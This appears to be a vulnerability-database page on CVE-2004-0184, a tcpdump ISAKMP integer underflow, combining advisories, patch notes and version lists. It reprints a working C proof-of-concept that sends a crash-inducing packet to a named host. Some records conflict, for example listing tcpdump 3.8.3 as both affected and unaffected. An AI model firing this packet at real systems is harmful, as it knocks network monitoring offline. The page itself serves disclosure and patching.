CVE-2004-0184
CVSS 5.0
Published: 2004-05-04 00:00:00
Revised: 2016-10-17 22:41:34

[Original] Integer underflow in the isakmp_id_print for TCPDUMP 3.8.1 and earlier allows remote attackers to cause a denial of service (crash) via an ISAKMP packet with an Identification payload with a length that becomes less than 8 during byte order conversion, which causes an out-of-bounds read, as demonstrated by the Striker ISAKMP Protocol Test Suite.


[CNNVD] TCPDump ISAKMP Identification Payload Remote Integer Overflow Vulnerability (CNNVD-200405-024)

        Tcpdump is a tool for monitoring network traffic and analysing protocols.
        Tcpdump's ISAKMP packet display function has a flaw in its handling of Identification payloads; a remote attacker can exploit it to mount a denial-of-service attack or to execute arbitrary instructions with the privileges of the process.
        An ISAKMP packet carrying a malformed Identification payload whose self-reported payload length is less than 8 makes TCPDUMP crash during byte-order conversion, because data beyond the snap buffer is read. The problem lies in the byte-order conversion in the isakmp_id_print() function:
         if (sizeof(*p) < id.h.len)
            data = (u_char *)(p + 1);
         else
            data = NULL;
         len = ntohs(id.h.len) - sizeof(*p);
        If id.h.len equals 256, len becomes:
         ntohs(256) - sizeof(*p)
        which is a negative value on the i386 architecture, causing an integer overflow.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

oval:org.mitre.oval:def:976  tcpdump Identification Payload in ISAKMP Packets Vulnerability
oval:org.mitre.oval:def:9581  Integer underflow in the isakmp_id_print for TCPDUMP 3.8.1 and earlier allows remote attackers to cause a denial of service (crash) via an I...
*OVAL describes in detail how to detect this vulnerability; see the related OVAL definitions for further technical details on detection.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0184
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0184
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200405-024
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=108067265931525&w=2
(UNKNOWN)  BUGTRAQ  20040330 R7-0017: TCPDUMP ISAKMP payload handling denial-of-service vulnerabilities
http://securitytracker.com/id?1009593
(UNKNOWN)  SECTRACK  1009593
http://www.debian.org/security/2004/dsa-478
(VENDOR_ADVISORY)  DEBIAN  DSA-478
http://www.kb.cert.org/vuls/id/492558
(UNKNOWN)  CERT-VN  VU#492558
http://www.rapid7.com/advisories/R7-0017.html
(VENDOR_ADVISORY)  MISC  http://www.rapid7.com/advisories/R7-0017.html
http://www.redhat.com/support/errata/RHSA-2004-219.html
(UNKNOWN)  REDHAT  RHSA-2004:219
http://www.securityfocus.com/bid/10004
(UNKNOWN)  BID  10004
http://www.tcpdump.org/tcpdump-changes.txt
(UNKNOWN)  CONFIRM  http://www.tcpdump.org/tcpdump-changes.txt
http://www.trustix.org/errata/2004/0015
(UNKNOWN)  TRUSTIX  2004-0015
http://xforce.iss.net/xforce/xfdb/15679
(UNKNOWN)  XF  tcpdump-isakmp-integer-underflow(15679)
https://bugzilla.fedora.us/show_bug.cgi?id=1468
(UNKNOWN)  FEDORA  FEDORA-2004-1468

- Vulnerability information

TCPDump ISAKMP Identification Payload Remote Integer Overflow Vulnerability
Medium  Unknown
2004-05-04 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

        Vendor patches:
        LBL
        ---
        The vendor has released an upgrade to fix this security issue; download it from the vendor's home page:
        LBL Upgrade tcpdump-3.8.3.tar.gz
        
        http://www.tcpdump.org/release/tcpdump-3.8.3.tar.gz

        Trustix
        -------
        The vendor has released an upgrade to fix this security issue; download it from the vendor's home page:
        Trustix Upgrade libpcap-0.8.2-1tr.i586.rpm
        ftp://ftp.trustix.org/pub/trustix/updates/1.5/rpms/libpcap-0.8.2-1tr.i586.rpm
        Trustix Upgrade tcpdump-3.8.2-1tr.i586.rpm
        ftp://ftp.trustix.org/pub/trustix/updates/1.5/rpms/tcpdump-3.8.2-1tr.i586.rpm

- Vulnerability information (171)

tcpdump ISAKMP Identification payload Integer Overflow Exploit (EDBID:171)
linux remote
2004-04-05 Verified
0 Rapid7
N/A
/*
 * tcpdump packet sniffer
 * Integer underflow in ISAKMP Identification payload
 * denial of service vulnerability
 * proof of concept code
 * version 1.0 (Apr 02 2004)
 * CVE-ID: CAN-2004-0184
 *
 * by Remi Denis-Courmont < exploit at simphalampin dot com >
 *   www simphalempin com dev 
 * Remi Denis-Courmont is not responsible for the misuse of the
 * source code provided hereafter.
 * 
 * This vulnerability was found by:
 *   Rapid7, LLC Security Advisory - www rapid7 com
 * whose original advisory may be fetched from:
 *   www rapid7 com advisories R7-0017 html
 *
 * Vulnerable:
 *  - tcpdump 3.8.1
 *
 * Not vulnerable:
 *  - tcpdump 3.8.3
 *
 * NOTES:
 *   The vulnerability cannot be exploited to cause a denial of service
 * with the Debian's tcpdump packages as it was partly fixed as part of
 * the fix for earlier known CAN-2003-0108 vulnerability, though the bug
 * is still present. That may be the case for other vendors which were
 * not investigated.
 *
 *   tcpdump must be run with a verbosity level of at least 3:
 * # tcpdump -vvv
 * Otherwise, no denial of service will occur.
 */


#include <string.h>
#include <stdio.h>

#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>

#include <netdb.h>

static const char packet[] =
	/* ISAKMP header */
	"\x00\x00\x00\x00\x00\x00\x00\x00" /* Initiator cookie */
	"\x00\x00\x00\x00\x00\x00\x00\x00" /* Responder cookie */
	"\x05"			/* Next payload: Identification */
	"\x10"			/* Version: 1.0 */
	"\x01"			/* Exchange type */
	"\x00"			/* Flags */
	"\x00\x00\x00\x00"	/* Message ID */
	"\x00\x00\x00\x24"	/* Length */
	
	/* ISAKMP Identification payload */
	"\x00"			/* Next payload: none */
	"\x00"			/* Reserved */
	"\x00\x05"		/* Payload length (incorrect) */
	"\x20"			/* ID type (unknown) */
	"\x00\x00\x00"		/* DOI */
;

static int
send_evil_packet (const struct addrinfo *r)
{
	int fd;
	size_t len;
		
	fd = socket (r->ai_family, r->ai_socktype, r->ai_protocol);
	if (fd == -1)
	{
		perror ("Socket error");
		return 1;
	}

	len = sizeof (packet) - 1;
	if (sendto (fd, packet, len, 0, r->ai_addr, r->ai_addrlen) != len)
	{
		perror ("Packet sending error");
		close (fd);
		return 1;
	}
	
	puts ("Packet sent!");
	close (fd);
	return 0;
}


static int
proof (const char *hostname)
{
	struct addrinfo *res;
	int check;
	
	{
		struct addrinfo help;
		memset (&help, 0, sizeof (help));
		help.ai_socktype = SOCK_DGRAM;
	
		check = getaddrinfo (hostname, "isakmp", &help, &res);
	}
	
	if (check == 0)
	{
		struct addrinfo *ptr;

		for (ptr = res; ptr != NULL; ptr = ptr->ai_next)
			check |= send_evil_packet (ptr);

		freeaddrinfo (res);
		return check;
	}

	fprintf (stderr, "%s: %s\n", hostname, gai_strerror (check));
	return -1;
}


static void
usage (const char *path)
{
	fprintf (stderr, "Usage: %s <hostname/IP>\n", path);
}


int
main (int argc, char *argv[])
{
	puts ("tcpdump Integer underflow in ISAKMP Identification payload\n"
		"proof of concept code\n"
		"Copyright (C) Remi Denis-Courmont 2004 "
		"<\x65\x78\x70\x6c\x6f\x69\x74\x40\x73\x69\x6d\x70"
		"\x68\x61\x6c\x65\x6d\x70\x69\x6e\x2e\x63\x6f\x6d>\n");
			
			
	if (argc != 2)
	{
		usage (argv[0]);
		return 2;
	}
		
	return proof (argv[1]) ? 1 : 0;
}

// milw0rm.com [2004-04-05]		

- Vulnerability information (F32981)

Rapid7 Security Advisory 17 (PacketStormID:F32981)
2004-03-30 00:00:00
Rapid7  rapid7.com
advisory,protocol
CVE-2004-0183,CVE-2004-0184

Rapid7 Security Advisory - tcpdump versions 3.8.1 and below contain multiple flaws in the packet display functions for the ISAKMP protocol. Upon receiving specially crafted ISAKMP packets, tcpdump will try to read beyond the end of the packet capture buffer and crash.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________
                     Rapid7, Inc. Security Advisory
       Visit http://www.rapid7.com/ to download NeXpose,
        the world's most advanced vulnerability scanner.
      Linux and Windows 2000/XP versions are available now!
_______________________________________________________________________

Rapid7 Advisory R7-0017
TCPDUMP ISAKMP payload handling denial-of-service vulnerabilities

   Published:  March 30, 2004
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0017.html

   CVE:    CAN-2004-0183, CAN-2004-0184

1. Affected system(s):

   KNOWN VULNERABLE:
    o TCPDUMP v3.8.1 and earlier versions

2. Summary

   TCPDUMP v3.8.1 and earlier versions contain multiple flaws in the
   packet display functions for the ISAKMP protocol.  Upon receiving
   specially crafted ISAKMP packets, TCPDUMP will try to read beyond
   the end of the packet capture buffer and crash.

3. Vendor status and information

   TCPDUMP
   http://www.tcpdump.org

   The vendor was notified and they have released an updated version
   of TCPDUMP, version 3.8.2, which fixes these defects.  Subsequently,
   the version number was bumped to 3.8.3 to match libpcap.

4. Solution

   Upgrade to version 3.8.3 of TCPDUMP.  You should also consider
   upgrading to version 0.8.3 of libpcap.  Note that many vendors
   package their own customized version of TCPDUMP and libpcap with
   their operating system distribution.  You may want to consider
   contacting your operating system vendor for an upgrade.

5. Detailed analysis

   To test the security and robustness of IPSEC implementations
   from multiple vendors, the security research team at Rapid7
   has designed the Striker ISAKMP Protocol Test Suite.  Striker
   is an ISAKMP packet generation tool that automatically produces
   and sends invalid and/or atypical ISAKMP packets.

   This advisory is the second in a series of vulnerability
   disclosures discovered with the Striker test suite.  Striker
   will be made available to qualified IPSEC vendors.  Please
   email advisory@rapid7.com for more information on obtaining
   Striker.

   There are two defects in the ISAKMP packet display functions in
   TCPDUMP.  Both of them require that verbose packet display be
   enabled with the -v option.  These defects result in out-of-bounds
   reads.

   Overflow in ISAKMP Delete payload with large number of SPI's
   CVE ID: CAN-2004-0183

      When displaying Delete payloads, TCPDUMP does not verify
      that (NSPIS * SPISIZE) fits within the snap buffer.

      An ISAKMP packet with a malformed Delete payload having
      a large self-reported number of SPI's will cause TCPDUMP
      to crash as it tries to read from beyond the end of the
      snap buffer.

      See section 3.15 of RFC 2408 for information on the
      Delete payload format.

   Integer underflow in ISAKMP Identification payload 
   CVE ID: CAN-2004-0184

      An ISAKMP packet with a malformed Identification payload
      with a self-reported payload length that becomes less than
      8 when its byte order is reversed will cause TCPDUMP to
      crash as it tries to read from beyond the end of the
      snap buffer.  TCPDUMP must be using a snaplen of 325 or
      greater for this underflow to be triggered.

      This is due to an inconsistency in the byte order conversion
      in the isakmp_id_print() function:

         if (sizeof(*p) < id.h.len)
            data = (u_char *)(p + 1);
         else 
            data = NULL;
         len = ntohs(id.h.len) - sizeof(*p);

      If id.h.len is equal to, say, 256 (and this fits within the snap
      buffer), then len will be equal to:

         ntohs(256) - sizeof(*p)

      which becomes a negative value on i386.

6. Contact Information

   Rapid7 Security Advisories
   Email:  advisory@rapid7.com
   Web:    http://www.rapid7.com/
   Phone:  +1 (617) 603-0700

7. Disclaimer and Copyright

   Rapid7, LLC is not responsible for the misuse of the information
   provided in our security advisories.  These advisories are a service
   to the professional security community.  There are NO WARRANTIES
   with regard to this information.  Any application or distribution of
   this information constitutes acceptance AS IS, at the user's own
   risk.  This information is subject to change without notice.

   This advisory Copyright (C) 2004 Rapid7, LLC.  Permission is
   hereby granted to redistribute this advisory, providing that no
   changes are made and that the copyright notices and disclaimers
   remain intact.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (OpenBSD)

iD8DBQFAaa48MiAxz4wsmx8RAr4lAJ0Y69TpTaDZkRxARdTdq1iwgRv+RQCeMEw9
Oh6mpCe95vffPgf+7Ku2o+c=
=YXNu
-----END PGP SIGNATURE-----
    
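The byte-order inconsistency described in the CNNVD summary above and in section 5 of the Rapid7 advisory, reproduced as an added worked example. This is not tcpdump's code and not part of this page's records: ISAKMP_ID_HDR_LEN stands in for sizeof(*p) (the 4-byte generic payload header of RFC 2408 plus the 4 fixed Identification fields), the payload bytes are constructed for the demonstration (the bogus one reuses the 0x0005 length field of the public PoC), and the helper names are this example's own. The flawed function models the old check as it behaves on a little-endian host; the hardened one converts the length once and validates it against both the header size and the captured length before any body is read.

```c
/*
 * Added example, not tcpdump's code: models the length check in the old
 * isakmp_id_print() beside a consistent, bounds-checked replacement.
 * ISAKMP_ID_HDR_LEN stands in for sizeof(*p) in the advisory (4-byte generic
 * payload header + ID type byte + 3 DOI-specific bytes, RFC 2408 section 3.8).
 */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define ISAKMP_ID_HDR_LEN 8u

/* Constructed Identification payload with the same bogus length field (0x0005)
 * as the public PoC: next payload 0, reserved 0, length, ID type 0x20, DOI bytes. */
static const unsigned char bogus_id_payload[] = {
    0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00
};

/* Constructed well-formed payload: length 12 = 8-byte header + 4 bytes of
 * identification data (ID type 1, three DOI-specific bytes, then the ID data). */
static const unsigned char good_id_payload[] = {
    0x00, 0x00, 0x00, 0x0c, 0x01, 0x11, 0x01, 0xf4,
    0xc0, 0xa8, 0x01, 0x01
};

/* The length field as ntohs() returns it: big-endian on the wire. */
static uint16_t read_be16(const unsigned char *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

/* The raw field as a little-endian (i386) host sees it when ntohs() is skipped. */
static uint16_t read_raw_le16(const unsigned char *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

/*
 * Flawed logic, as it behaves on i386.  The guard compares sizeof(*p) with the
 * length field in wire order (no ntohs), so the bytes 00 05 are seen as
 * 0x0500 = 1280 and the payload is accepted; the length arithmetic then uses
 * the converted value, 5 - 8 wraps in unsigned arithmetic, and the result
 * lands in a signed 32-bit int as a negative count.  *data_present reports
 * whether the guard let the payload through.  Returns the body length the
 * old code would have passed on to the printer.
 */
int32_t vulnerable_id_body_len(const unsigned char *payload, size_t caplen,
                               int *data_present)
{
    uint32_t len;

    if (caplen < ISAKMP_ID_HDR_LEN) {        /* header itself not captured */
        *data_present = 0;
        return -1;
    }
    *data_present = ISAKMP_ID_HDR_LEN < read_raw_le16(payload + 2);
    /* ntohs(id.h.len) - sizeof(*p): unsigned subtraction, so 5 - 8 = 0xFFFFFFFD */
    len = (uint32_t)read_be16(payload + 2) - ISAKMP_ID_HDR_LEN;
    return (int32_t)len;                      /* two's complement: -3 */
}

/*
 * Hardened logic: convert once, then validate the self-reported length
 * against both its own header size and the bytes actually captured.
 * Returns the body length, or -1 for a payload that must not be printed.
 */
int32_t checked_id_body_len(const unsigned char *payload, size_t caplen)
{
    uint16_t plen;

    if (caplen < ISAKMP_ID_HDR_LEN)
        return -1;
    plen = read_be16(payload + 2);
    if (plen < ISAKMP_ID_HDR_LEN)            /* shorter than its own header: the underflow case */
        return -1;
    if (plen > caplen)                       /* would read past the snap buffer */
        return -1;
    return (int32_t)(plen - ISAKMP_ID_HDR_LEN);
}

int main(void)
{
    int present = 0;
    int32_t v = vulnerable_id_body_len(bogus_id_payload, sizeof bogus_id_payload, &present);

    printf("old check on bogus payload: guard passed=%d, body len=%d\n", present, (int)v);
    printf("new check on bogus payload: body len=%d\n",
           (int)checked_id_body_len(bogus_id_payload, sizeof bogus_id_payload));
    printf("new check on well-formed payload: body len=%d\n",
           (int)checked_id_body_len(good_id_payload, sizeof good_id_payload));
    return 0;
}
```

The two checks differ in exactly the way the advisory describes: the old guard and the old arithmetic look at the same field in two byte orders, so a length that passes the guard can still be smaller than the header it describes. The fixed version also rejects a length that exceeds the captured bytes, which is the other read-past-snap-buffer case in the same advisory (CAN-2004-0183).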

- Vulnerability information

4750
tcpdump ISAKMP Identification Payload DoS
Denial of Service
Loss of Availability
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2004-03-31 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Credit

Unknown or Incomplete

- Vulnerability information

TCPDump ISAKMP Identification Payload Integer Underflow Vulnerability
Unknown 10004
Yes No
2004-03-30 12:00:00 2009-07-12 04:06:00
Discovery is credited to Rapid7.

- Affected software versions

SGI ProPack 3.0
SGI ProPack 2.4
RedHat Linux 9.0 i386
RedHat Linux 7.3
LBL tcpdump 3.8.1
+ Mandriva Linux Mandrake 10.0
LBL tcpdump 3.7.2
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Turbolinux Turbolinux Advanced Server 6.0
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 6.5
+ Turbolinux Turbolinux Server 6.1
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Turbolinux Turbolinux Workstation 6.1
+ Turbolinux Turbolinux Workstation 6.0
LBL tcpdump 3.7.1
+ FreeBSD FreeBSD 4.7 -RELEASE
+ FreeBSD FreeBSD 4.7
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
+ S.u.S.E. Linux 8.1
LBL tcpdump 3.7
+ FreeBSD FreeBSD 4.6 -RELEASE
+ FreeBSD FreeBSD 4.6
+ FreeBSD FreeBSD 4.5 -STABLE
+ FreeBSD FreeBSD 4.5 -RELEASE
+ FreeBSD FreeBSD 4.5
+ FreeBSD FreeBSD 4.4 -STABLE
+ FreeBSD FreeBSD 4.4 -RELENG
+ FreeBSD FreeBSD 4.4
+ FreeBSD FreeBSD 4.3 -STABLE
+ FreeBSD FreeBSD 4.3 -RELENG
+ FreeBSD FreeBSD 4.3 -RELEASE
+ FreeBSD FreeBSD 4.3
+ FreeBSD FreeBSD 4.2 -STABLE
+ FreeBSD FreeBSD 4.2 -RELEASE
+ FreeBSD FreeBSD 4.2
LBL tcpdump 3.6.3
+ EnGarde Secure Community 2.0
+ EnGarde Secure Community 1.0.1
+ EnGarde Secure Professional 1.5
+ EnGarde Secure Professional 1.2
+ EnGarde Secure Professional 1.1
LBL tcpdump 3.6.2
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ FreeBSD FreeBSD 4.3
+ FreeBSD FreeBSD 4.2
+ FreeBSD FreeBSD 4.1.1
+ FreeBSD FreeBSD 4.1
+ FreeBSD FreeBSD 4.0
+ HP Secure OS software for Linux 1.0
+ MandrakeSoft Corporate Server 1.0.1
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ S.u.S.E. Linux 8.0
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
LBL tcpdump 3.5.2
LBL tcpdump 3.5 alpha
LBL tcpdump 3.5
+ FreeBSD FreeBSD 4.1.1
+ FreeBSD FreeBSD 4.1
+ FreeBSD FreeBSD 4.0
+ FreeBSD FreeBSD 3.x
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3
LBL tcpdump 3.4 a6
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ S.u.S.E. Firewall Adminhost VPN
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux Admin-CD for Firewall
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Enterprise Server for S/390
+ S.u.S.E. Linux Live-CD for Firewall
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 7
LBL tcpdump 3.4
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
Apple Mac OS X Server 10.3.5
Apple Mac OS X Server 10.3.4
Apple Mac OS X Server 10.2.8
Apple Mac OS X 10.3.5
Apple Mac OS X 10.3.4
Apple Mac OS X 10.2.8
LBL tcpdump 3.8.3
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
+ Turbolinux Appliance Server 1.0 Workgroup Edition
+ Turbolinux Appliance Server 1.0 Hosting Edition
+ Turbolinux Appliance Server Hosting Edition 1.0
+ Turbolinux Appliance Server Workgroup Edition 1.0
+ Turbolinux Home
+ Turbolinux Turbolinux 10 F...
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
LBL tcpdump 3.8.2

- Unaffected software versions

LBL tcpdump 3.8.3
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
+ Turbolinux Appliance Server 1.0 Workgroup Edition
+ Turbolinux Appliance Server 1.0 Hosting Edition
+ Turbolinux Appliance Server Hosting Edition 1.0
+ Turbolinux Appliance Server Workgroup Edition 1.0
+ Turbolinux Home
+ Turbolinux Turbolinux 10 F...
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
LBL tcpdump 3.8.2

- Vulnerability discussion

tcpdump is prone to a denial of service vulnerability due to an integer underflow.

This issue exists in tcpdump's ISAKMP packet display functions. This issue affects how ISAKMP Identification payloads are handled. This may cause a denial of service.

- Exploit

The following exploit has been provided:

- Solution

Mandrake has released an advisory (MDKSA-2004:030) and fixes to address this issue. Mandrake users are advised to apply these fixes as soon as possible. Further information regarding obtaining and applying fixes can be found in the referenced advisory.

Trustix has released an advisory that includes updates for this issue.

Debian has released advisory DSA 478-1 and fixes dealing with this issue.

OpenPKG has provided advisory SA-2004.010 and an update dealing with this issue.

Slackware has released advisory SSA:2004-108-01 to provide fixes for this issue. Please see the attached advisory for details on obtaining and applying fixes.

RedHat has released advisory FEDORA-2004-120 to provide fixes for Fedora. Please see the attached advisory for details on obtaining and applying fixes.

Red Hat has released advisory RHSA-2004:219-07 and fixes to address this and other issues on Red Hat Linux Enterprise platforms. Customers who are affected by this issue are advised to apply the appropriate updates. Customers subscribed to the Red Hat Network may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.

This issue is addressed in tcpdump 3.8.3.

Turbolinux has released advisory TLSA-2004-16 to provide fixes for this issue. Please see the attached advisory for details on obtaining and applying fixes.

SGI has released an advisory (20040603-01-U) to address this and other issues in SGI ProPack 3. Please see the referenced advisory for more information.

SGI has released an advisory (20040602-01-U) to address this and other issues in SGI ProPack 2.4. Please see the referenced advisory for more information.

Apple has released an advisory (APPLE-SA-0024-09-07) along with fixes to address this, and many other issues. Please see the referenced advisory for further information.

The Fedora Legacy project has released advisory FLSA:1468 along with fixes to address this, and other issues. Please see the referenced advisory for further information.


Apple Mac OS X 10.2.8

Apple Mac OS X Server 10.2.8

Apple Mac OS X Server 10.3.4

Apple Mac OS X 10.3.4

Apple Mac OS X Server 10.3.5

Apple Mac OS X 10.3.5

SGI ProPack 2.4

SGI ProPack 3.0

LBL tcpdump 3.4 a6

LBL tcpdump 3.4

LBL tcpdump 3.5 alpha

LBL tcpdump 3.5

LBL tcpdump 3.5.2

LBL tcpdump 3.6.2

LBL tcpdump 3.6.3

LBL tcpdump 3.7

LBL tcpdump 3.7.1

LBL tcpdump 3.7.2

LBL tcpdump 3.8.1

- References
